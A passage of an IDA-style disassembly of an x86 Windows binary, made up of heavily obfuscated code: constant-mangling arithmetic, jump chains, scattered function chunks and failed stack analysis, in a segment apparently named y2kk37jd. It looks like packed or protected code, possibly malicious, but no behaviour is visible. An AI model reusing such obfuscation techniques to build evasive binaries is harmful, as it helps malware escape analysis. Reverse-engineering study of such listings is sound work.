; START	OF FUNCTION CHUNK FOR sub_43C054

loc_4460BA:				; CODE XREF: sub_43C054:loc_45A93Ej
		jz	loc_44D3B6
		jmp	loc_453167
; END OF FUNCTION CHUNK	FOR sub_43C054
; ---------------------------------------------------------------------------

locret_4460C5:				; CODE XREF: y2kk37jd:0045927Ej
		retn
; ---------------------------------------------------------------------------

loc_4460C6:				; CODE XREF: y2kk37jd:0044A7CDj
		jmp	loc_4510B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F67B

loc_4460CB:				; CODE XREF: sub_43F67B+70D7j
		jmp	loc_454496
; END OF FUNCTION CHUNK	FOR sub_43F67B

; =============== S U B	R O U T	I N E =======================================



sub_4460D0	proc near		; CODE XREF: sub_44447A+3j
					; sub_446C4E:loc_448C1Bj ...

; FUNCTION CHUNK AT 00442464 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448222 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E9F7 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004573BB SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004575E2 SIZE 0000000B BYTES

		jb	sub_44B79D
		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_44585C
		jmp	loc_448222
sub_4460D0	endp


; =============== S U B	R O U T	I N E =======================================



sub_4460E8	proc near		; CODE XREF: y2kk37jd:00440600j
					; sub_43BE53:loc_44180Ep

; FUNCTION CHUNK AT 0044B64B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00453C9C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045884D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B4E4 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	769A706h
		pop	esi
		rol	esi, 0Bh
		and	esi, 5FE1E942h
		cmp	esi, 0A0877353h
		jmp	loc_45B4E4
sub_4460E8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CD48

loc_446106:				; CODE XREF: sub_44CD48+Aj
		add	ecx, ebp
		call	sub_459703
; END OF FUNCTION CHUNK	FOR sub_44CD48

; =============== S U B	R O U T	I N E =======================================



sub_44610D	proc near		; CODE XREF: sub_44610D-7DA4p
					; y2kk37jd:0044DEB5j

var_8		= dword	ptr -8
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043E35B SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0043E990 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00440D14 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00441793 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004418CE SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00441B3B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442150 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00442292 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044268C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00442855 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443326 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00443621 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443D3C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004481D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448A93 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004494A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AD0F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044DB6B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ECD4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EE57 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450A59 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452022 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00452342 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00452C78 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00452F74 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00453231 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00453491 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00454156 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045438C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00456783 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00456C5B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004575C4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00457799 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457AC1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004592A7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A1A5 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045A286 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045C559 SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		cmp	dword ptr [ebp-8], 19h
		jnz	loc_440D14
		jmp	loc_4592A7
sub_44610D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_446120	proc near		; CODE XREF: sub_456809+Fp

; FUNCTION CHUNK AT 0043C76E SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043F110 SIZE 0000000F BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		jmp	loc_43F110
sub_446120	endp

; ---------------------------------------------------------------------------

loc_44612B:				; CODE XREF: y2kk37jd:loc_44F749j
					; y2kk37jd:00455F79j
		and	ecx, 0B58DDB5h
		add	ecx, 1527AABEh
		sub	eax, ecx
		pop	ecx
		jmp	loc_452E88
; ---------------------------------------------------------------------------

loc_44613F:				; CODE XREF: y2kk37jd:loc_454FA4j
		mov	ecx, edx
		xchg	ecx, [esp]
		push	edx
		push	94AD420Eh
		pop	edx

loc_44614B:				; CODE XREF: y2kk37jd:loc_453B32j
		jmp	loc_45077C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CB82

loc_446150:				; CODE XREF: sub_43CB82+3j
		xor	eax, [ebx+ecx+4]
		cmp	eax, 7C61090Eh
		retn
; END OF FUNCTION CHUNK	FOR sub_43CB82
; ---------------------------------------------------------------------------

loc_44615A:				; CODE XREF: y2kk37jd:00450643j
					; y2kk37jd:00455818j
		jmp	loc_4405A3

; =============== S U B	R O U T	I N E =======================================



sub_44615F	proc near		; CODE XREF: sub_459AB0:loc_451A8Bp
					; sub_45380A+Dp

; FUNCTION CHUNK AT 00440733 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443F76 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446524 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004558C7 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004590CB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459DD9 SIZE 00000005 BYTES

		xor	bx, bx
		add	ebx, 10000h
		jmp	loc_440733
sub_44615F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44616D:				; CODE XREF: y2kk37jd:loc_458F06j
		push	0EC5D8541h
		pop	esi
		or	esi, 0DB229543h
		add	esi, 0C53D61h
		mov	[esi], eax
		pop	esi

locret_446182:				; CODE XREF: y2kk37jd:loc_44520Fj
		retn

; =============== S U B	R O U T	I N E =======================================



sub_446183	proc near		; CODE XREF: sub_443BAF:loc_43BECCj
					; sub_457533:loc_43F628p ...

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0044EB82 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00453C20 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456266 SIZE 0000000E BYTES

		jnb	loc_453C20

loc_446189:				; CODE XREF: sub_44594E+951Fj
		jmp	sub_444E83
sub_446183	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_44618E:				; CODE XREF: sub_43F8B8+1462Bj
		jo	loc_44449B

loc_446194:				; CODE XREF: sub_43F8B8:loc_44F90Fj
		call	sub_44A298

loc_446199:				; CODE XREF: sub_444180-19FCj
		jmp	loc_43FE88
; END OF FUNCTION CHUNK	FOR sub_43F8B8

; =============== S U B	R O U T	I N E =======================================



sub_44619E	proc near		; DATA XREF: sub_44CEAB+5A3Ao

; FUNCTION CHUNK AT 00452292 SIZE 0000000E BYTES

		mov	eax, [ebp-14h]
		mov	eax, [eax+24h]
		add	eax, [ebp-4]
		xor	edx, edx
		push	edx
		push	eax
		call	sub_44472C

loc_4461B0:				; CODE XREF: sub_454E20-14CEDj
		jmp	loc_452292
sub_44619E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_4461B5:				; CODE XREF: sub_44753E:loc_455B5Bj
					; y2kk37jd:00455B6Ej
		and	esi, 26B2FB9Dh
		add	esi, 0D992305Ah
		xchg	esi, [esp+8+var_8]
		jmp	loc_43D09B
; END OF FUNCTION CHUNK	FOR sub_44753E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_235. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4461CA:				; CODE XREF: y2kk37jd:00441693j
		jmp	loc_4597F5
; ---------------------------------------------------------------------------
		or	eax, eax
		jnz	loc_43B978
		jmp	loc_43CA1D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_4461DC:				; CODE XREF: sub_4514DE:loc_4563EAj
		jz	loc_44AD71

loc_4461E2:				; CODE XREF: sub_43F4CE+14BFDj
		jmp	nullsub_182
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
		popf
		jmp	loc_43DAEC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_97. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_4461EE:				; CODE XREF: sub_451A35:loc_442BE8j
					; sub_451A35-EE3Ej
		xor	edx, 0CC60351Eh
		rol	edx, 2
		call	sub_43C3F1

loc_4461FC:				; CODE XREF: y2kk37jd:0043DCC8j
		jmp	loc_44666A
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554A3

loc_446201:				; CODE XREF: sub_4554A3:loc_45BFA5j
		jz	loc_43C57C
		jmp	loc_43E197
; END OF FUNCTION CHUNK	FOR sub_4554A3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_44620C:				; CODE XREF: sub_43B163:loc_43E9D3j
		push	edx
		call	sub_4599BE
		mov	eax, 3195933h
		call	sub_440337
		mov	ds:off_41E204, eax
		lea	eax, loc_45854F
		jmp	loc_43C50D
; END OF FUNCTION CHUNK	FOR sub_43B163
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_207. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44622E:				; CODE XREF: y2kk37jd:00451A7Dj
		jmp	sub_456A36
; ---------------------------------------------------------------------------

loc_446233:				; CODE XREF: y2kk37jd:0044F51Bj
		jmp	loc_45295C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_446238:				; CODE XREF: sub_4507BF-5137j
		jmp	loc_44AD01
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442717

loc_44623D:				; CODE XREF: sub_442717+Cj
		jmp	loc_45544F
; END OF FUNCTION CHUNK	FOR sub_442717
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443CD

loc_446242:				; CODE XREF: sub_4443CD+17AABj
		push	edx
		call	sub_4448E2
		push	4EEC6839h
		pop	eax
		jmp	loc_45B063
; END OF FUNCTION CHUNK	FOR sub_4443CD
; ---------------------------------------------------------------------------
		call	sub_453FAB

loc_446258:				; CODE XREF: y2kk37jd:0043B227j
		jb	loc_4585F2

; =============== S U B	R O U T	I N E =======================================



sub_44625E	proc near		; CODE XREF: sub_459546:loc_445FDBp

; FUNCTION CHUNK AT 00457898 SIZE 0000000E BYTES

		xchg	eax, [esp+0]
		pop	eax
		pushf
		push	47C9E723h
		jmp	loc_457898
sub_44625E	endp


; =============== S U B	R O U T	I N E =======================================



sub_44626D	proc near		; DATA XREF: y2kk37jd:00444CB4o

; FUNCTION CHUNK AT 00456A64 SIZE 0000001C BYTES

		push	559D6591h
		pop	eax
		sub	eax, 102CC50Ch
		add	eax, 3F8911CBh
		jmp	loc_456A64
sub_44626D	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_115. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F770

loc_446285:				; CODE XREF: sub_43F770+1941Bj
		jmp	nullsub_256
; END OF FUNCTION CHUNK	FOR sub_43F770
; ---------------------------------------------------------------------------

loc_44628A:				; CODE XREF: y2kk37jd:00448926j
		jmp	loc_44E53E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44628F:				; CODE XREF: sub_43F911:loc_45490Fj
		xor	edi, 0E7040043h
		cmp	eax, 0E4D4E261h
		jmp	loc_43D18B
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_4462A0:				; CODE XREF: sub_443BAF:loc_44C5D3j
		xchg	edx, [esp+14h+var_14]
		jmp	loc_43BECC
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
		mov	edx, 0A70158B4h
		call	sub_440CD1
		push	eax
		ror	eax, 8
		mov	ds:dword_450BB0, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_4462BD:				; CODE XREF: sub_4448E2+1061Bj
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_4462C2:				; CODE XREF: y2kk37jd:00454652j
		jmp	loc_44C4A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45866A

loc_4462C7:				; CODE XREF: sub_45866A-651Fj
		jmp	sub_4415B8
; END OF FUNCTION CHUNK	FOR sub_45866A
; ---------------------------------------------------------------------------

loc_4462CC:				; CODE XREF: y2kk37jd:00444938j
		jmp	loc_4456A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_4462D1:				; CODE XREF: sub_443BAF+F193j
		rol	eax, 8
		jmp	loc_4436DB
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
		xor	ebp, edi
		jmp	loc_43E0ED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454187

loc_4462E0:				; CODE XREF: sub_454187:loc_45BBEEj
		ror	eax, 0Fh
		mov	ds:dword_4516C8, eax
; END OF FUNCTION CHUNK	FOR sub_454187
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_47. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F5BD

loc_4462EA:				; CODE XREF: sub_43F5BD+DDCDj
		jmp	nullsub_267
; END OF FUNCTION CHUNK	FOR sub_43F5BD
; ---------------------------------------------------------------------------

loc_4462EF:				; CODE XREF: y2kk37jd:00441435j
		jmp	loc_43C912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466E0

loc_4462F4:				; CODE XREF: sub_4466E0+5E82j
					; sub_4580C5+8j
		rol	eax, 0Fh
		push	ecx
		mov	ecx, ebx
		xchg	ecx, [esp+4+var_4]
		push	eax
		jmp	loc_458EF1
; END OF FUNCTION CHUNK	FOR sub_4466E0

; =============== S U B	R O U T	I N E =======================================



sub_446303	proc near		; CODE XREF: sub_445226-82D5p
					; y2kk37jd:004563F5j

; FUNCTION CHUNK AT 0043CAD3 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044295F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044329F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00447F2F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004556EE SIZE 00000017 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	7D7C4122h
		xchg	ebp, [esp+0]
		mov	ecx, ebp
		pop	ebp
		add	ecx, 0B4A5623h
		xor	ecx, 9614E43Bh
		jmp	loc_447F2F
sub_446303	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_446323	proc near		; CODE XREF: y2kk37jd:0043DB39j
					; sub_44D627+EB5Ep

arg_0		= dword	ptr  4

		xchg	eax, [esp+0]
		pop	eax
		xchg	ebx, [esp-4+arg_0]
		push	offset loc_440D69
		jmp	nullsub_44
sub_446323	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_446334:				; CODE XREF: y2kk37jd:0044377Fj
					; sub_445226+26D6j
		jo	loc_43F9B3
		lea	eax, [ebp-24h]
		push	eax
		push	100h
		lea	eax, [ebp-2C8h]
		push	eax
		jmp	loc_45B110
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_44634F:				; CODE XREF: sub_44113A+A869j
		jg	loc_44D4EF

loc_446355:				; CODE XREF: sub_43F567+5j
					; sub_44113A:loc_4420E7j
		add	dword ptr [ebp-4], 8
		jmp	loc_43B630
; END OF FUNCTION CHUNK	FOR sub_44113A

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44635E	proc near		; CODE XREF: sub_455531p
					; sub_4486E1:loc_4560ECj

; FUNCTION CHUNK AT 0043B62B SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	offset loc_446700
		jmp	loc_43B62B
sub_44635E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C79

loc_44636B:				; CODE XREF: sub_455C79-18505j
		push	offset loc_45843E
		jmp	nullsub_213
; END OF FUNCTION CHUNK	FOR sub_455C79
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADEC

loc_446375:				; CODE XREF: sub_45ADEC+Aj
		mov	al, [eax]
		jz	loc_44A21F
		sub	al, 99h
		mov	edx, [ebp+var_4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_459F87
		jmp	loc_45C23F
; END OF FUNCTION CHUNK	FOR sub_45ADEC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_486. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_446392:				; CODE XREF: sub_44113A+FB3j
		jmp	loc_44B99B
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_446397:				; CODE XREF: sub_445226-58AFj
		jmp	loc_455373
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_44639C:				; CODE XREF: y2kk37jd:0043B453j
		jmp	loc_441D2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B1FD

loc_4463A1:				; CODE XREF: sub_43B1FD:loc_43B20Aj
		rol	ebx, 10h
		and	ebx, 954E442h
		test	ebx, 4000000h
		jmp	loc_4402BC
; END OF FUNCTION CHUNK	FOR sub_43B1FD
; ---------------------------------------------------------------------------

loc_4463B5:				; CODE XREF: y2kk37jd:00459A78j
		mov	ds:dword_41E0BC, eax
		call	sub_43B0CB
		mov	eax, 0CE6B079Ah
		push	offset sub_4483B5
		jmp	loc_452B6B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_67. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45380A

loc_4463D0:				; CODE XREF: sub_45380A-1C1Bj
		jmp	loc_458819
; END OF FUNCTION CHUNK	FOR sub_45380A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_4463D5:				; CODE XREF: sub_4447EA-776Cj
		xor	ebp, 0E579AE58h

loc_4463DB:				; CODE XREF: sub_4447EA:loc_447500j
		mov	eax, 10h
		push	ecx
		push	203121F9h
		pop	ecx
		and	ecx, 84D3A444h
		jmp	loc_45925C
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADEC

loc_4463F2:				; CODE XREF: sub_45ADEC:loc_446665j
		rol	esi, 10h
		push	ebx
		jmp	loc_459F87
; END OF FUNCTION CHUNK	FOR sub_45ADEC
; ---------------------------------------------------------------------------

loc_4463FB:				; CODE XREF: y2kk37jd:00441095j
		add	edx, 7F319BF7h
		mov	[edx], eax
		pop	edx
		lea	eax, loc_45939D
		jmp	loc_43DEA6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A961

loc_44640F:				; CODE XREF: sub_45A961-6171j
		xor	esi, 0E563EABDh
		and	esi, 2A60A917h
		sub	esi, 6C6D4802h
		add	esi, 44B1294Eh
		xchg	esi, [esp+0]
		jmp	sub_44113A
; END OF FUNCTION CHUNK	FOR sub_45A961
; ---------------------------------------------------------------------------

loc_44642F:				; CODE XREF: y2kk37jd:004478D3j
		jz	loc_452E26
		jl	loc_442E6B

loc_44643B:				; CODE XREF: y2kk37jd:loc_4478C0j
		sub	esi, 90699A3Eh
		add	esi, 91ADBE2Bh
		jmp	loc_4538A7
; ---------------------------------------------------------------------------

loc_44644C:				; CODE XREF: y2kk37jd:loc_454B99j
		push	edx
		push	eax
		push	0DB48C3D6h
		mov	eax, ecx
		jmp	loc_44863D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D627

loc_44645A:				; CODE XREF: sub_44D627:loc_45BD4Fj
		jnp	loc_44E730
		adc	eax, esi
		adc	edi, esi
		jmp	loc_4573CF
; END OF FUNCTION CHUNK	FOR sub_44D627
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EC21

loc_446469:				; CODE XREF: sub_44EC21:loc_456684j
		jnz	loc_43BA82
		jmp	loc_43B6E6
; END OF FUNCTION CHUNK	FOR sub_44EC21
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450857

loc_446474:				; CODE XREF: sub_43F346:loc_441833j
					; sub_450857+B68Cj
		rol	eax, 1Ah
		xor	eax, 0BEEEF17h
		push	offset loc_43FB68
		jmp	nullsub_418
; END OF FUNCTION CHUNK	FOR sub_450857
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_446487:				; CODE XREF: sub_453867:loc_450DA0j
		sub	al, 99h
		push	0B2CA0243h
		pop	edx
		or	edx, 8C4EAA75h
		rol	edx, 1Dh
		jmp	loc_44DB9D
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_44649D:				; CODE XREF: sub_445568-5C8Ej
		jz	loc_458456

loc_4464A3:				; CODE XREF: sub_445568:loc_44D708j
		lea	eax, [ebp-2BBh]
		call	sub_45AAAA

loc_4464AE:				; CODE XREF: sub_44C01B-48B3j
		jmp	loc_44C967
; END OF FUNCTION CHUNK	FOR sub_445568

; =============== S U B	R O U T	I N E =======================================



sub_4464B3	proc near		; CODE XREF: y2kk37jd:0043B080p
					; sub_43EA11:loc_43B17Dj ...

; FUNCTION CHUNK AT 0045A686 SIZE 00000005 BYTES

		push	eax
		mov	eax, ebp
		push	offset loc_4453D1
		jmp	loc_45A686
sub_4464B3	endp

; ---------------------------------------------------------------------------
		not	ebx
		jmp	sub_4490B4
; ---------------------------------------------------------------------------
		test	eax, eax
		jnz	loc_454754
		jmp	loc_445103
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_4464D4:				; CODE XREF: sub_43ED19:loc_44DA34j
		jnz	loc_45973F

loc_4464DA:				; CODE XREF: sub_4435B9+DEC2j
		jmp	loc_43E1C2
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6E9

loc_4464DF:				; CODE XREF: sub_44A6E9-1E15j
		jmp	nullsub_60
; END OF FUNCTION CHUNK	FOR sub_44A6E9
; ---------------------------------------------------------------------------
		or	ebp, edx
		adc	ecx, edx
		jmp	loc_45973F
; ---------------------------------------------------------------------------

locret_4464ED:				; CODE XREF: y2kk37jd:loc_44EC12j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_4464EE:				; CODE XREF: sub_45B7AA:loc_440F44j
		push	0E62ADB88h
		xchg	edx, [esp+4+var_4]
		mov	esi, edx
		pop	edx
		and	esi, 2F946523h
		add	esi, 0DA419F58h
		mov	[esi], eax
		pop	esi
		jmp	loc_44BA16
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------

loc_44650D:				; CODE XREF: y2kk37jd:0044BD50j
					; y2kk37jd:loc_45B771j
		mov	eax, [esp]
		push	edi
		push	8071E1A1h
		pop	edi
		rol	edi, 1
		jmp	loc_44CC4C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_291. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444693

loc_44651F:				; CODE XREF: sub_444693+770Dj
		jmp	loc_44D606
; END OF FUNCTION CHUNK	FOR sub_444693
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44615F

loc_446524:				; CODE XREF: sub_44615F:loc_4558C7j
		sub	ebx, 10000h
		call	sub_440DC1
; END OF FUNCTION CHUNK	FOR sub_44615F
; START	OF FUNCTION CHUNK FOR sub_44853F

loc_44652F:				; CODE XREF: sub_44853F+1Cj
		jmp	loc_4558BF
; END OF FUNCTION CHUNK	FOR sub_44853F
; ---------------------------------------------------------------------------

loc_446534:				; CODE XREF: y2kk37jd:0043E73Aj
		pushf
		and	ecx, 0C8678365h
		xor	esi, ebp
; START	OF FUNCTION CHUNK FOR sub_43DD0E

loc_44653D:				; CODE XREF: sub_43DD0E:loc_43E72Ej
		and	ecx, 4041E42Ch
		add	ecx, 3EA7Ch
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_4481EF
; END OF FUNCTION CHUNK	FOR sub_43DD0E
; ---------------------------------------------------------------------------

loc_446551:				; CODE XREF: y2kk37jd:004514F9j
		jge	loc_4524DB

loc_446557:				; CODE XREF: y2kk37jd:0045230Dj
		jmp	loc_43EE9B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45922C

loc_44655C:				; CODE XREF: sub_45922C-C3A7j
		jmp	loc_4520FC
; END OF FUNCTION CHUNK	FOR sub_45922C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44252E

loc_446561:				; CODE XREF: sub_44252E+1Bj
		jmp	loc_45990F
; END OF FUNCTION CHUNK	FOR sub_44252E
; ---------------------------------------------------------------------------
		jbe	loc_459EBB
		mov	eax, ebx
		sub	ecx, 661FD975h
		jmp	loc_44520F
; ---------------------------------------------------------------------------

loc_446579:				; CODE XREF: y2kk37jd:004595D3j
		mov	ebx, [esi]
		not	edx
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_44657D:				; CODE XREF: sub_43C851:loc_4595C2j
		add	eax, ds:4000EBh
		and	eax, 5D3C60C5h
		xor	eax, 519A1903h
		add	eax, ebp

loc_446591:				; CODE XREF: y2kk37jd:00444232j
		push	edx
		jmp	loc_43B09F
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
		pushf
		jmp	sub_458CE4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_172. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_44659E:				; CODE XREF: sub_456809+51C2j
		jmp	loc_45A0A0
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------

loc_4465A3:				; CODE XREF: y2kk37jd:004524E7j
		jmp	loc_4507A8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B508

loc_4465A8:				; CODE XREF: sub_44B508-28BAj
		jmp	nullsub_105
; END OF FUNCTION CHUNK	FOR sub_44B508
; ---------------------------------------------------------------------------

loc_4465AD:				; CODE XREF: y2kk37jd:00447742j
		jmp	loc_44D27C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F811

loc_4465B2:				; CODE XREF: sub_43F811+1Bj
		jmp	loc_44496E
; END OF FUNCTION CHUNK	FOR sub_43F811
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_4465B7:				; CODE XREF: sub_45B7AA-1FDECj
		xor	ecx, edi
		shl	edi, 19h
		and	ebp, ebx
		jmp	loc_4512A1
; END OF FUNCTION CHUNK	FOR sub_45B7AA

; =============== S U B	R O U T	I N E =======================================



sub_4465C3	proc near		; DATA XREF: sub_44DB32+E296o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00443B58 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445FC6 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044C1A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455CC3 SIZE 00000006 BYTES
